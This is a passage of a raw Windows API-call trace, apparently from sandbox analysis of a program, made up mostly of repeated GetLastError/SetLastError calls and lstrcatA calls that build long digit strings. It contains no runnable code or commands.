0x80 [0117.289] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b11f8) returned 0x80 [0117.289] GetLastError () returned 0x0 [0117.289] SetLastError (dwErrCode=0x0) [0117.289] GetLastError () returned 0x0 [0117.290] SetLastError (dwErrCode=0x0) [0117.290] GetLastError () returned 0x0 [0117.290] SetLastError (dwErrCode=0x0) [0117.290] GetLastError () returned 0x0 [0117.290] SetLastError (dwErrCode=0x0) [0117.290] GetLastError () returned 0x0 [0117.290] SetLastError (dwErrCode=0x0) [0117.290] GetLastError () returned 0x0 [0117.290] SetLastError (dwErrCode=0x0) [0117.290] GetLastError () returned 0x0 [0117.290] SetLastError (dwErrCode=0x0) [0117.290] GetLastError () returned 0x0 [0117.290] SetLastError (dwErrCode=0x0) [0117.290] GetLastError () returned 0x0 [0117.290] SetLastError (dwErrCode=0x0) [0117.290] GetLastError () returned 0x0 [0117.290] SetLastError (dwErrCode=0x0) [0117.290] GetLastError () returned 0x0 [0117.290] SetLastError (dwErrCode=0x0) [0117.290] GetLastError () returned 0x0 [0117.290] SetLastError (dwErrCode=0x0) [0117.290] GetLastError () returned 0x0 [0117.290] SetLastError (dwErrCode=0x0) [0117.291] GetLastError () returned 0x0 [0117.291] SetLastError (dwErrCode=0x0) [0117.291] GetLastError () returned 0x0 [0117.291] SetLastError (dwErrCode=0x0) [0117.291] GetLastError () returned 0x0 [0117.291] SetLastError (dwErrCode=0x0) [0117.291] GetLastError () returned 0x0 [0117.291] SetLastError (dwErrCode=0x0) [0117.291] GetLastError () returned 0x0 [0117.291] SetLastError (dwErrCode=0x0) [0117.291] GetLastError () returned 0x0 [0117.291] SetLastError (dwErrCode=0x0) [0117.291] GetLastError () returned 0x0 [0117.291] SetLastError (dwErrCode=0x0) [0117.291] GetLastError () returned 0x0 [0117.291] SetLastError (dwErrCode=0x0) [0117.291] GetLastError () returned 0x0 [0117.291] SetLastError (dwErrCode=0x0) [0117.291] GetLastError () returned 0x0 [0117.291] SetLastError (dwErrCode=0x0) [0117.291] GetLastError () returned 0x0 [0117.291] SetLastError (dwErrCode=0x0) [0117.291] GetLastError () returned 0x0 [0117.291] SetLastError (dwErrCode=0x0) [0117.291] GetLastError () returned 0x0 [0117.292] SetLastError (dwErrCode=0x0) [0117.292] GetLastError () returned 0x0 [0117.292] SetLastError (dwErrCode=0x0) [0117.292] GetLastError () returned 0x0 [0117.292] SetLastError (dwErrCode=0x0) [0117.292] GetLastError () returned 0x0 [0117.292] SetLastError (dwErrCode=0x0) [0117.292] GetLastError () returned 0x0 [0117.292] SetLastError (dwErrCode=0x0) [0117.292] GetLastError () returned 0x0 [0117.292] SetLastError (dwErrCode=0x0) [0117.292] GetLastError () returned 0x0 [0117.292] SetLastError (dwErrCode=0x0) [0117.292] GetLastError () returned 0x0 [0117.292] SetLastError (dwErrCode=0x0) [0117.292] GetLastError () returned 0x0 [0117.292] SetLastError (dwErrCode=0x0) [0117.292] GetLastError () returned 0x0 [0117.292] SetLastError (dwErrCode=0x0) [0117.292] GetLastError () returned 0x0 [0117.292] SetLastError (dwErrCode=0x0) [0117.292] GetLastError () returned 0x0 [0117.292] SetLastError (dwErrCode=0x0) [0117.292] GetLastError () returned 0x0 [0117.293] SetLastError (dwErrCode=0x0) [0117.293] GetLastError () returned 0x0 [0117.293] SetLastError (dwErrCode=0x0) [0117.293] GetLastError () returned 0x0 [0117.293] SetLastError (dwErrCode=0x0) [0117.293] GetLastError () returned 0x0 [0117.293] SetLastError (dwErrCode=0x0) [0117.293] GetLastError () returned 0x0 [0117.293] SetLastError (dwErrCode=0x0) [0117.293] GetLastError () returned 0x0 [0117.293] SetLastError (dwErrCode=0x0) [0117.293] GetLastError () returned 0x0 [0117.293] SetLastError (dwErrCode=0x0) [0117.293] GetLastError () returned 0x0 [0117.293] SetLastError (dwErrCode=0x0) [0117.293] GetLastError () returned 0x0 [0117.293] SetLastError (dwErrCode=0x0) [0117.293] GetLastError () returned 0x0 [0117.293] SetLastError (dwErrCode=0x0) [0117.293] GetLastError () returned 0x0 [0117.293] SetLastError (dwErrCode=0x0) [0117.293] GetLastError () returned 0x0 [0117.293] SetLastError (dwErrCode=0x0) [0117.293] GetLastError () returned 0x0 [0117.294] SetLastError (dwErrCode=0x0) [0117.294] GetLastError () returned 0x0 [0117.294] SetLastError (dwErrCode=0x0) [0117.294] GetLastError () returned 0x0 [0117.294] SetLastError (dwErrCode=0x0) [0117.294] GetLastError () returned 0x0 [0117.294] SetLastError (dwErrCode=0x0) [0117.294] GetLastError () returned 0x0 [0117.294] SetLastError (dwErrCode=0x0) [0117.294] GetLastError () returned 0x0 [0117.294] SetLastError (dwErrCode=0x0) [0117.294] GetLastError () returned 0x0 [0117.294] SetLastError (dwErrCode=0x0) [0117.294] GetLastError () returned 0x0 [0117.294] SetLastError (dwErrCode=0x0) [0117.294] GetLastError () returned 0x0 [0117.294] SetLastError (dwErrCode=0x0) [0117.294] GetLastError () returned 0x0 [0117.294] SetLastError (dwErrCode=0x0) [0117.294] GetLastError () returned 0x0 [0117.294] SetLastError (dwErrCode=0x0) [0117.294] GetLastError () returned 0x0 [0117.294] SetLastError (dwErrCode=0x0) [0117.294] GetLastError () returned 0x0 [0117.295] SetLastError (dwErrCode=0x0) [0117.295] GetLastError () returned 0x0 [0117.295] SetLastError (dwErrCode=0x0) [0117.295] GetLastError () returned 0x0 [0117.295] SetLastError (dwErrCode=0x0) [0117.295] GetLastError () returned 0x0 [0117.295] SetLastError (dwErrCode=0x0) [0117.295] GetLastError () returned 0x0 [0117.295] SetLastError (dwErrCode=0x0) [0117.295] GetLastError () returned 0x0 [0117.295] SetLastError (dwErrCode=0x0) [0117.295] GetLastError () returned 0x0 [0117.295] SetLastError (dwErrCode=0x0) [0117.295] GetLastError () returned 0x0 [0117.295] SetLastError (dwErrCode=0x0) [0117.295] GetLastError () returned 0x0 [0117.295] SetLastError (dwErrCode=0x0) [0117.295] GetLastError () returned 0x0 [0117.295] SetLastError (dwErrCode=0x0) [0117.295] GetLastError () returned 0x0 [0117.295] SetLastError (dwErrCode=0x0) [0117.295] GetLastError () returned 0x0 [0117.295] SetLastError (dwErrCode=0x0) [0117.295] GetLastError () returned 0x0 [0117.296] SetLastError (dwErrCode=0x0) [0117.296] GetLastError () returned 0x0 [0117.296] SetLastError (dwErrCode=0x0) [0117.296] GetLastError () returned 0x0 [0117.296] SetLastError (dwErrCode=0x0) [0117.296] GetLastError () returned 0x0 [0117.296] SetLastError (dwErrCode=0x0) [0117.296] GetLastError () returned 0x0 [0117.296] SetLastError (dwErrCode=0x0) [0117.296] GetLastError () returned 0x0 [0117.296] SetLastError (dwErrCode=0x0) [0117.296] GetLastError () returned 0x0 [0117.296] SetLastError (dwErrCode=0x0) [0117.296] GetLastError () returned 0x0 [0117.296] SetLastError (dwErrCode=0x0) [0117.296] GetLastError () returned 0x0 [0117.296] lstrcatA (in: lpString1="", lpString2="1" | out: lpString1="1") returned="1" [0117.296] lstrcatA (in: lpString1="1", lpString2="3" | out: lpString1="13") returned="13" [0117.296] lstrcatA (in: lpString1="13", lpString2="5" | out: lpString1="135") returned="135" [0117.296] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x5c25d0 [0117.296] lstrcatA (in: lpString1="135", lpString2="6" | out: lpString1="1356") returned="1356" [0117.296] lstrcatA (in: lpString1="1356", lpString2="1" | out: lpString1="13561") returned="13561" [0117.297] lstrcatA (in: lpString1="13561", lpString2="2" | out: lpString1="135612") returned="135612" [0117.297] lstrcatA (in: lpString1="135612", lpString2="6" | out: lpString1="1356126") returned="1356126" [0117.297] lstrcatA (in: lpString1="1356126", lpString2="3" | out: lpString1="13561263") returned="13561263" [0117.297] lstrcatA (in: lpString1="13561263", lpString2="8" | out: lpString1="135612638") returned="135612638" [0117.297] lstrcatA (in: lpString1="135612638", lpString2="7" | out: lpString1="1356126387") returned="1356126387" [0117.297] lstrcatA (in: lpString1="1356126387", lpString2="4" | out: lpString1="13561263874") returned="13561263874" [0117.297] lstrlenA (lpString="1OMS09") returned 6 [0117.297] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.297] lstrcatA (in: lpString1="135612638744", lpString2="7" | out: lpString1="1356126387447") returned="1356126387447" [0117.297] lstrcatA (in: lpString1="1356126387447", lpString2="7" | out: lpString1="13561263874477") returned="13561263874477" [0117.297] lstrcatA (in: lpString1="13561263874477", lpString2="4" | out: lpString1="135612638744774") returned="135612638744774" [0117.297] lstrlenA (lpString="1OMS09") returned 6 [0117.297] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.297] lstrcatA (in: lpString1="1356126387447744", lpString2="7" | out: lpString1="13561263874477447") returned="13561263874477447" [0117.297] lstrcatA (in: lpString1="13561263874477447", lpString2="7" | out: lpString1="135612638744774477") returned="135612638744774477" [0117.297] lstrcatA (in: lpString1="135612638744774477", lpString2="4" | out: lpString1="1356126387447744774") returned="1356126387447744774" [0117.297] lstrlenA (lpString="1OMS09") returned 6 [0117.297] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.297] lstrcatA (in: lpString1="13561263874477447744", lpString2="7" | out: lpString1="135612638744774477447") returned="135612638744774477447" [0117.297] lstrcatA (in: lpString1="135612638744774477447", lpString2="7" | out: lpString1="1356126387447744774477") returned="1356126387447744774477" [0117.297] lstrcatA (in: lpString1="1356126387447744774477", lpString2="4" | out: lpString1="13561263874477447744774") returned="13561263874477447744774" [0117.297] lstrlenA (lpString="1OMS09") returned 6 [0117.297] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.297] lstrcatA (in: lpString1="135612638744774477447744", lpString2="7" | out: lpString1="1356126387447744774477447") returned="1356126387447744774477447" [0117.297] lstrcatA (in: lpString1="1356126387447744774477447", lpString2="7" | out: lpString1="13561263874477447744774477") returned="13561263874477447744774477" [0117.297] lstrcatA (in: lpString1="13561263874477447744774477", lpString2="4" | out: lpString1="135612638744774477447744774") returned="135612638744774477447744774" [0117.297] lstrlenA (lpString="1OMS09") returned 6 [0117.297] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.297] lstrcatA (in: lpString1="1356126387447744774477447744", lpString2="7" | out: lpString1="13561263874477447744774477447") returned="13561263874477447744774477447" [0117.297] lstrcatA (in: lpString1="13561263874477447744774477447", lpString2="7" | out: lpString1="135612638744774477447744774477") returned="135612638744774477447744774477" [0117.297] lstrcatA (in: lpString1="135612638744774477447744774477", lpString2="4" | out: lpString1="1356126387447744774477447744774") returned="1356126387447744774477447744774" [0117.298] lstrlenA (lpString="1OMS09") returned 6 [0117.298] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.298] lstrcatA (in: lpString1="13561263874477447744774477447744", lpString2="7" | out: lpString1="135612638744774477447744774477447") returned="135612638744774477447744774477447" [0117.298] lstrcatA (in: lpString1="135612638744774477447744774477447", lpString2="98" | out: lpString1="13561263874477447744774477447744798") returned="13561263874477447744774477447744798" [0117.298] lstrcatA (in: lpString1="13561263874477447744774477447744798", lpString2="9" | out: lpString1="135612638744774477447744774477447989") returned="135612638744774477447744774477447989" [0117.298] lstrcatA (in: lpString1="135612638744774477447744774477447989", lpString2="00" | out: lpString1="13561263874477447744774477447744798900") returned="13561263874477447744774477447744798900" [0117.298] lstrcatA (in: lpString1="", lpString2="1" | out: lpString1="1") returned="1" [0117.298] lstrcatA (in: lpString1="1", lpString2="3" | out: lpString1="13") returned="13" [0117.298] lstrcatA (in: lpString1="13", lpString2="5" | out: lpString1="135") returned="135" [0117.298] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x5c25e0 [0117.298] lstrcatA (in: lpString1="135", lpString2="6" | out: lpString1="1356") returned="1356" [0117.298] lstrcatA (in: lpString1="1356", lpString2="1" | out: lpString1="13561") returned="13561" [0117.298] lstrcatA (in: lpString1="13561", lpString2="2" | out: lpString1="135612") returned="135612" [0117.298] lstrcatA (in: lpString1="135612", lpString2="6" | out: lpString1="1356126") returned="1356126" [0117.298] lstrcatA (in: lpString1="1356126", lpString2="3" | out: lpString1="13561263") returned="13561263" [0117.298] lstrcatA (in: lpString1="13561263", lpString2="8" | out: lpString1="135612638") returned="135612638" [0117.298] lstrcatA (in: lpString1="135612638", lpString2="7" | out: lpString1="1356126387") returned="1356126387" [0117.298] lstrcatA (in: lpString1="1356126387", lpString2="4" | out: lpString1="13561263874") returned="13561263874" [0117.298] lstrlenA (lpString="3QX9ATY") returned 7 [0117.298] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.298] lstrcatA (in: lpString1="135612638744", lpString2="7" | out: lpString1="1356126387447") returned="1356126387447" [0117.298] lstrcatA (in: lpString1="1356126387447", lpString2="7" | out: lpString1="13561263874477") returned="13561263874477" [0117.298] lstrcatA (in: lpString1="13561263874477", lpString2="4" | out: lpString1="135612638744774") returned="135612638744774" [0117.298] lstrlenA (lpString="3QX9ATY") returned 7 [0117.298] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.298] lstrcatA (in: lpString1="1356126387447744", lpString2="7" | out: lpString1="13561263874477447") returned="13561263874477447" [0117.298] lstrcatA (in: lpString1="13561263874477447", lpString2="7" | out: lpString1="135612638744774477") returned="135612638744774477" [0117.298] lstrcatA (in: lpString1="135612638744774477", lpString2="4" | out: lpString1="1356126387447744774") returned="1356126387447744774" [0117.299] lstrlenA (lpString="3QX9ATY") returned 7 [0117.299] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.299] lstrcatA (in: lpString1="13561263874477447744", lpString2="7" | out: lpString1="135612638744774477447") returned="135612638744774477447" [0117.299] lstrcatA (in: lpString1="135612638744774477447", lpString2="7" | out: lpString1="1356126387447744774477") returned="1356126387447744774477" [0117.299] lstrcatA (in: lpString1="1356126387447744774477", lpString2="4" | out: lpString1="13561263874477447744774") returned="13561263874477447744774" [0117.299] lstrlenA (lpString="3QX9ATY") returned 7 [0117.299] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.299] lstrcatA (in: lpString1="135612638744774477447744", lpString2="7" | out: lpString1="1356126387447744774477447") returned="1356126387447744774477447" [0117.299] lstrcatA (in: lpString1="1356126387447744774477447", lpString2="7" | out: lpString1="13561263874477447744774477") returned="13561263874477447744774477" [0117.299] lstrcatA (in: lpString1="13561263874477447744774477", lpString2="4" | out: lpString1="135612638744774477447744774") returned="135612638744774477447744774" [0117.299] lstrlenA (lpString="3QX9ATY") returned 7 [0117.299] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.299] lstrcatA (in: lpString1="1356126387447744774477447744", lpString2="7" | out: lpString1="13561263874477447744774477447") returned="13561263874477447744774477447" [0117.299] lstrcatA (in: lpString1="13561263874477447744774477447", lpString2="7" | out: lpString1="135612638744774477447744774477") returned="135612638744774477447744774477" [0117.299] lstrcatA (in: lpString1="135612638744774477447744774477", lpString2="4" | out: lpString1="1356126387447744774477447744774") returned="1356126387447744774477447744774" [0117.299] lstrlenA (lpString="3QX9ATY") returned 7 [0117.299] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.299] lstrcatA (in: lpString1="13561263874477447744774477447744", lpString2="7" | out: lpString1="135612638744774477447744774477447") returned="135612638744774477447744774477447" [0117.299] lstrcatA (in: lpString1="135612638744774477447744774477447", lpString2="7" | out: lpString1="1356126387447744774477447744774477") returned="1356126387447744774477447744774477" [0117.299] lstrcatA (in: lpString1="1356126387447744774477447744774477", lpString2="4" | out: lpString1="13561263874477447744774477447744774") returned="13561263874477447744774477447744774" [0117.299] lstrlenA (lpString="3QX9ATY") returned 7 [0117.299] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.299] lstrcatA (in: lpString1="135612638744774477447744774477447744", lpString2="7" | out: lpString1="1356126387447744774477447744774477447") returned="1356126387447744774477447744774477447" [0117.299] lstrcatA (in: lpString1="1356126387447744774477447744774477447", lpString2="98" | out: lpString1="135612638744774477447744774477447744798") returned="135612638744774477447744774477447744798" [0117.299] lstrcatA (in: lpString1="135612638744774477447744774477447744798", lpString2="9" | out: lpString1="1356126387447744774477447744774477447989") returned="1356126387447744774477447744774477447989" [0117.299] lstrcatA (in: lpString1="1356126387447744774477447744774477447989", lpString2="00" | out: lpString1="135612638744774477447744774477447744798900") returned="135612638744774477447744774477447744798900" [0117.299] lstrcatA (in: lpString1="", lpString2="1" | out: lpString1="1") returned="1" [0117.299] lstrcatA (in: lpString1="1", lpString2="3" | out: lpString1="13") returned="13" [0117.299] lstrcatA (in: lpString1="13", lpString2="5" | out: lpString1="135") returned="135" [0117.299] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x5bf6c8 [0117.299] lstrcatA (in: lpString1="135", lpString2="6" | out: lpString1="1356") returned="1356" [0117.300] lstrcatA (in: lpString1="1356", lpString2="1" | out: lpString1="13561") returned="13561" [0117.300] lstrcatA (in: lpString1="13561", lpString2="2" | out: lpString1="135612") returned="135612" [0117.300] lstrcatA (in: lpString1="135612", lpString2="6" | out: lpString1="1356126") returned="1356126" [0117.300] lstrcatA (in: lpString1="1356126", lpString2="3" | out: lpString1="13561263") returned="13561263" [0117.300] lstrcatA (in: lpString1="13561263", lpString2="8" | out: lpString1="135612638") returned="135612638" [0117.300] lstrcatA (in: lpString1="135612638", lpString2="7" | out: lpString1="1356126387") returned="1356126387" [0117.300] lstrcatA (in: lpString1="1356126387", lpString2="4" | out: lpString1="13561263874") returned="13561263874" [0117.300] lstrlenA (lpString="BKYPU4ZT6VC8") returned 12 [0117.300] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.300] lstrcatA (in: lpString1="135612638744", lpString2="7" | out: lpString1="1356126387447") returned="1356126387447" [0117.300] lstrcatA (in: lpString1="1356126387447", lpString2="7" | out: lpString1="13561263874477") returned="13561263874477" [0117.300] lstrcatA (in: lpString1="13561263874477", lpString2="4" | out: lpString1="135612638744774") returned="135612638744774" [0117.300] lstrlenA (lpString="BKYPU4ZT6VC8") returned 12 [0117.300] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.300] lstrcatA (in: lpString1="1356126387447744", lpString2="7" | out: lpString1="13561263874477447") returned="13561263874477447" [0117.300] lstrcatA (in: lpString1="13561263874477447", lpString2="7" | out: lpString1="135612638744774477") returned="135612638744774477" [0117.300] lstrcatA (in: lpString1="135612638744774477", lpString2="4" | out: lpString1="1356126387447744774") returned="1356126387447744774" [0117.300] lstrlenA (lpString="BKYPU4ZT6VC8") returned 12 [0117.300] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.300] lstrcatA (in: lpString1="13561263874477447744", lpString2="7" | out: lpString1="135612638744774477447") returned="135612638744774477447" [0117.300] lstrcatA (in: lpString1="135612638744774477447", lpString2="7" | out: lpString1="1356126387447744774477") returned="1356126387447744774477" [0117.300] lstrcatA (in: lpString1="1356126387447744774477", lpString2="4" | out: lpString1="13561263874477447744774") returned="13561263874477447744774" [0117.300] lstrlenA (lpString="BKYPU4ZT6VC8") returned 12 [0117.300] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.300] lstrcatA (in: lpString1="135612638744774477447744", lpString2="7" | out: lpString1="1356126387447744774477447") returned="1356126387447744774477447" [0117.300] lstrcatA (in: lpString1="1356126387447744774477447", lpString2="7" | out: lpString1="13561263874477447744774477") returned="13561263874477447744774477" [0117.300] lstrcatA (in: lpString1="13561263874477447744774477", lpString2="4" | out: lpString1="135612638744774477447744774") returned="135612638744774477447744774" [0117.300] lstrlenA (lpString="BKYPU4ZT6VC8") returned 12 [0117.300] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.300] lstrcatA (in: lpString1="1356126387447744774477447744", lpString2="7" | out: lpString1="13561263874477447744774477447") returned="13561263874477447744774477447" [0117.300] lstrcatA (in: lpString1="13561263874477447744774477447", lpString2="7" | out: lpString1="135612638744774477447744774477") returned="135612638744774477447744774477" [0117.301] lstrcatA (in: lpString1="135612638744774477447744774477", lpString2="4" | out: lpString1="1356126387447744774477447744774") returned="1356126387447744774477447744774" [0117.301] lstrlenA (lpString="BKYPU4ZT6VC8") returned 12 [0117.301] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.301] lstrcatA (in: lpString1="13561263874477447744774477447744", lpString2="7" | out: lpString1="135612638744774477447744774477447") returned="135612638744774477447744774477447" [0117.301] lstrcatA (in: lpString1="135612638744774477447744774477447", lpString2="7" | out: lpString1="1356126387447744774477447744774477") returned="1356126387447744774477447744774477" [0117.301] lstrcatA (in: lpString1="1356126387447744774477447744774477", lpString2="4" | out: lpString1="13561263874477447744774477447744774") returned="13561263874477447744774477447744774" [0117.301] lstrlenA (lpString="BKYPU4ZT6VC8") returned 12 [0117.301] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.301] lstrcatA (in: lpString1="135612638744774477447744774477447744", lpString2="7" | out: lpString1="1356126387447744774477447744774477447") returned="1356126387447744774477447744774477447" [0117.301] lstrcatA (in: lpString1="1356126387447744774477447744774477447", lpString2="7" | out: lpString1="13561263874477447744774477447744774477") returned="13561263874477447744774477447744774477" [0117.301] lstrcatA (in: lpString1="13561263874477447744774477447744774477", lpString2="4" | out: lpString1="135612638744774477447744774477447744774") returned="135612638744774477447744774477447744774" [0117.301] lstrlenA (lpString="BKYPU4ZT6VC8") returned 12 [0117.301] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.301] lstrcatA (in: lpString1="1356126387447744774477447744774477447744", lpString2="7" | out: lpString1="13561263874477447744774477447744774477447") returned="13561263874477447744774477447744774477447" [0117.301] lstrcatA (in: lpString1="13561263874477447744774477447744774477447", lpString2="7" | out: lpString1="135612638744774477447744774477447744774477") returned="135612638744774477447744774477447744774477" [0117.301] lstrcatA (in: lpString1="135612638744774477447744774477447744774477", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774") returned="1356126387447744774477447744774477447744774" [0117.301] lstrlenA (lpString="BKYPU4ZT6VC8") returned 12 [0117.301] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744" [0117.301] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744", lpString2="7" | out: lpString1="135612638744774477447744774477447744774477447") returned="135612638744774477447744774477447744774477447" [0117.301] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447", lpString2="7" | out: lpString1="1356126387447744774477447744774477447744774477") returned="1356126387447744774477447744774477447744774477" [0117.301] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774") returned="13561263874477447744774477447744774477447744774" [0117.301] lstrlenA (lpString="BKYPU4ZT6VC8") returned 12 [0117.301] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744" [0117.301] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744", lpString2="7" | out: lpString1="1356126387447744774477447744774477447744774477447") returned="1356126387447744774477447744774477447744774477447" [0117.301] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447", lpString2="7" | out: lpString1="13561263874477447744774477447744774477447744774477") returned="13561263874477447744774477447744774477447744774477" [0117.301] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744774") returned="135612638744774477447744774477447744774477447744774" [0117.301] lstrlenA (lpString="BKYPU4ZT6VC8") returned 12 [0117.301] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744" [0117.301] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744", lpString2="7" | out: lpString1="13561263874477447744774477447744774477447744774477447") returned="13561263874477447744774477447744774477447744774477447" [0117.301] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447", lpString2="7" | out: lpString1="135612638744774477447744774477447744774477447744774477") returned="135612638744774477447744774477447744774477447744774477" [0117.302] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774477", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744774") returned="1356126387447744774477447744774477447744774477447744774" [0117.302] lstrlenA (lpString="BKYPU4ZT6VC8") returned 12 [0117.302] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744774477447744" [0117.302] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447744", lpString2="7" | out: lpString1="135612638744774477447744774477447744774477447744774477447") returned="135612638744774477447744774477447744774477447744774477447" [0117.302] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774477447", lpString2="98" | out: lpString1="13561263874477447744774477447744774477447744774477447744798") returned="13561263874477447744774477447744774477447744774477447744798" [0117.302] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447744798", lpString2="9" | out: lpString1="135612638744774477447744774477447744774477447744774477447989") returned="135612638744774477447744774477447744774477447744774477447989" [0117.302] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774477447989", lpString2="00" | out: lpString1="13561263874477447744774477447744774477447744774477447744798900") returned="13561263874477447744774477447744774477447744774477447744798900" [0117.302] lstrcatA (in: lpString1="", lpString2="1" | out: lpString1="1") returned="1" [0117.302] lstrcatA (in: lpString1="1", lpString2="3" | out: lpString1="13") returned="13" [0117.302] lstrcatA (in: lpString1="13", lpString2="5" | out: lpString1="135") returned="135" [0117.302] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x5bf6e0 [0117.302] lstrcatA (in: lpString1="135", lpString2="6" | out: lpString1="1356") returned="1356" [0117.302] lstrcatA (in: lpString1="1356", lpString2="1" | out: lpString1="13561") returned="13561" [0117.302] lstrcatA (in: lpString1="13561", lpString2="2" | out: lpString1="135612") returned="135612" [0117.302] lstrcatA (in: lpString1="135612", lpString2="6" | out: lpString1="1356126") returned="1356126" [0117.302] lstrcatA (in: lpString1="1356126", lpString2="3" | out: lpString1="13561263") returned="13561263" [0117.302] lstrcatA (in: lpString1="13561263", lpString2="8" | out: lpString1="135612638") returned="135612638" [0117.302] lstrcatA (in: lpString1="135612638", lpString2="7" | out: lpString1="1356126387") returned="1356126387" [0117.302] lstrcatA (in: lpString1="1356126387", lpString2="4" | out: lpString1="13561263874") returned="13561263874" [0117.302] lstrlenA (lpString="YVK3AZDS") returned 8 [0117.302] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.302] lstrcatA (in: lpString1="135612638744", lpString2="7" | out: lpString1="1356126387447") returned="1356126387447" [0117.302] lstrcatA (in: lpString1="1356126387447", lpString2="7" | out: lpString1="13561263874477") returned="13561263874477" [0117.302] lstrcatA (in: lpString1="13561263874477", lpString2="4" | out: lpString1="135612638744774") returned="135612638744774" [0117.302] lstrlenA (lpString="YVK3AZDS") returned 8 [0117.302] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.302] lstrcatA (in: lpString1="1356126387447744", lpString2="7" | out: lpString1="13561263874477447") returned="13561263874477447" [0117.302] lstrcatA (in: lpString1="13561263874477447", lpString2="7" | out: lpString1="135612638744774477") returned="135612638744774477" [0117.302] lstrcatA (in: lpString1="135612638744774477", lpString2="4" | out: lpString1="1356126387447744774") returned="1356126387447744774" [0117.302] lstrlenA (lpString="YVK3AZDS") returned 8 [0117.303] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.303] lstrcatA (in: lpString1="13561263874477447744", lpString2="7" | out: lpString1="135612638744774477447") returned="135612638744774477447" [0117.303] lstrcatA (in: lpString1="135612638744774477447", lpString2="7" | out: lpString1="1356126387447744774477") returned="1356126387447744774477" [0117.303] lstrcatA (in: lpString1="1356126387447744774477", lpString2="4" | out: lpString1="13561263874477447744774") returned="13561263874477447744774" [0117.303] lstrlenA (lpString="YVK3AZDS") returned 8 [0117.303] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.303] lstrcatA (in: lpString1="135612638744774477447744", lpString2="7" | out: lpString1="1356126387447744774477447") returned="1356126387447744774477447" [0117.303] lstrcatA (in: lpString1="1356126387447744774477447", lpString2="7" | out: 